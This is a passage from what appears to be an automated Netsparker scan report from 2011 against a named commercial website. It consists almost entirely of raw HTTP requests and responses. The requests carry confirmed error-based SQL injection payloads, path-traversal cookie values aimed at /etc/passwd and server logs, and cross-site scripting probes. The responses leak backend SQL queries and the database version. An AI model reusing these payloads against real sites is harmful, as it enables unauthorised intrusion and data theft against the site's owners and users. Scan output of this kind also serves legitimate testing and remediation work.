OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kl7inls2vf4bkeo4oip8q21ea1; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/obtm00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b7tsop5103jt1e5o5dbviv3lg1; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
